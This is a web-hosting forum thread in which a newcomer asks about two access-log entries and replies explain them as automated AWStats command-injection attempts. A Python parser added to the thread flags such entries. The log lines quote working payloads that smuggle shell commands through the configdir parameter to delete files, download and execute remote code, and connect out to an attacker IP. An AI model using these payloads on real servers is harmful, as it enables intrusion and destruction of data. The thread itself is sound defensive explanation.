PHILLIPO -
Joined: 29 Jul 2005 Posts: 9 Location: SOUTHWEST UK
Posted: Sat Oct 22, 2005 2:35 am Post subject: Server Log Help
How can I learn to decipher my server log? Being relatively new to HTTP/hosting/servers etc., I would like to be able to understand the entries in layman's terms - or even learn the syntax of entries such as
204.91.207.11 - - [21/Oct/2005:09:38:27 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Anyone able to assist?
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Sat Oct 22, 2005 8:54 am
You've picked a fairly tricky one as an example - it's actually a request looking to find a vulnerable version of AWStats and then do some pretty nasty stuff with perl shell trojans. The format itself is easy to explain though. http://www.bacuslabs.com/WsvlCLF.html has a great introduction. Check the section on "What is an Extended Common Log Format file?"
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..."
PHILLIPO -
Joined: 29 Jul 2005 Posts: 9 Location: SOUTHWEST UK
Posted: Thu Dec 08, 2005 12:20 pm Post subject: Another complex log entry
211.214.161.159 - - [04/Dec/2005:00:04:05 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Can you tell me what AWstats is?
What is this entry - in layman's terms? I may have mentioned that I was a hardware tech. back in 89-90 - but software jargon goes way over my head.... thanks
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Thu Dec 08, 2005 12:43 pm
AWStats is a Perl script which can be run on your server to provide a detailed breakdown of your access log. A while back, a vulnerability was discovered, which allowed unauthorised users to modify systems running the vulnerable version of the script.
The important part of the request in this respect is
Quote:
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
which is a request to the directory awstats (/awstats/) to access the file awstats.pl and pass the parameter
Quote:
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
which is the part of the request that would exploit a vulnerable system by forcing it to download and execute code from an external site.
The 404 in your request line shows that the file was not found and an error was returned to the attacker (which was most likely automated rather than an individual specifically targeting you).
Hope this clears things up.
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..."
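
Added example (not part of the original posts): a small Python parser that performs the breakdown described in the reply above on the second log entry from the thread, percent-decoding the `configdir` parameter and reporting the 404. The function names and `BENIGN_LINE` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
# Characters a shell interprets; none belong in a directory name such as configdir.
SHELL_META = set("|;&`$<>")

# Second entry quoted in the thread, verbatim.
THREAD_LINE = r'211.214.161.159 - - [04/Dec/2005:00:04:05 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
# Constructed benign entry for comparison (documentation address 192.0.2.10).
BENIGN_LINE = '192.0.2.10 - - [04/Dec/2005:00:05:00 +0000] "GET /index.html?page=2 HTTP/1.1" 200 1043 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'

def parse_line(line):
    """Split one log line into fields and percent-decode the query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # partition() rather than urlsplit(): a target starting with "//" (first
    # entry in the thread) would otherwise be read as a host name.
    entry["path"], _, query = entry["target"].partition("?")
    pairs = (p.partition("=") for p in query.split("&") if p)
    entry["params"] = {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}
    return entry

def suspicious_params(entry):
    """Return the decoded parameters that contain shell metacharacters."""
    return {k: v for k, v in entry["params"].items() if SHELL_META & set(v)}

def describe(line):
    entry = parse_line(line)
    if entry is None:
        return "unparsed"
    flagged = suspicious_params(entry)
    if not flagged:
        return "ok"
    # 404 (as in the thread) means the script was not there; a 2xx answer means
    # the script exists and the host needs a closer look.
    outcome = "answered" if 200 <= entry["status"] < 300 else "rejected"
    return (f"injection attempt on {entry['path']} "
            f"({', '.join(flagged)}): {outcome} with {entry['status']}")

if __name__ == "__main__":
    for sample in (THREAD_LINE, BENIGN_LINE):
        print(describe(sample))
```
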
aprelium -
Joined: 22 Mar 2002 Posts: 6800
Posted: Thu Dec 08, 2005 12:46 pm Post subject: Re: Another complex log entry
PHILLIPO wrote: Can you tell me what AWstats is?
AWstats is a popular script which analyses web site logs.
_________________
Support Team
Aprelium - http://www.aprelium.com